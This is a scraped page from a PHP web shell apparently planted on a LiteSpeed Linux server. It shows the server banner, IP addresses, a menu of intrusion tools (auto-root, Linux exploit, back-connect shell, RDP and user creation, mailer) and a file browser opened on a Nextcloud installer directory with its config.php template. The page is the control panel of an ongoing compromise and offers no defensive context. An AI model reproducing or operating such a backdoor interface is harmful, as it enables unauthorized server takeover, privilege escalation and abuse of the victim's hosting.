Linux salto.nuvemidc.com 5.14.0-687.42.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Aug 27 11:55:12 EDT 2026 x86_64
LiteSpeed
: 177.73.233.61 | : 216.73.217.116
Cant Read [ /etc/named.conf ]
7.4.33
agenci18
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
softaculous /
nextcloud /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.htaccess
6.67
KB
-rw-r--r--
_.htaccess
534
B
-rw-r--r--
changelog.txt
9.36
KB
-rw-r--r--
check_suphp.php
101
B
-rw-r--r--
clone.php
5.73
KB
-rw-r--r--
config.php
1.03
KB
-rw-r--r--
edit.php
5.82
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
6.91
KB
-rw-r--r--
fileindex.php
293
B
-rw-r--r--
import.php
3.54
KB
-rw-r--r--
info.xml
4.67
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
16.68
KB
-rw-r--r--
install.xml
1.59
KB
-rw-r--r--
md5
1.63
KB
-rw-r--r--
notes.txt
2.72
KB
-rw-r--r--
update_pass.php
1.02
KB
-rw-r--r--
upgrade.php
5.42
KB
-rw-r--r--
upgrade.xml
299
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php /* * WARNING * * This file gets modified by automatic processes and all lines that are not * active code (ie. comments) are lost during that process. * * If you want to document things with comments or use constants add your settings * in a '<NAME>.config.php' file which will be included and rendered into this file. * * Example: * <?php * $CONFIG = []; * * See also: https://docs.nextcloud.com/server/latest/admin_manual/configuration_server/config_sample_php_parameters.html#multiple-merged-configuration-files */ $CONFIG = array ( 'instanceid' => '[[instanceid]]', 'passwordsalt' => '[[passwordsalt]]', 'secret' => '[[secret]]', 'trusted_domains' => array ( 0 => '[[domhost]]', ), 'datadirectory' => '[[softdatadir]]', 'dbtype' => 'mysql', 'version' => '34.0.3.2', 'overwrite.cli.url' => '[[softurl]]', 'dbname' => '[[softdb]]', 'dbhost' => '[[softdbhost]]', 'dbtableprefix' => 'oc_', 'dbuser' => '[[softdbuser]]', 'dbpassword' => '[[softdbpass]]', 'installed' => true, [[mysql_utf8mb4]] );
Close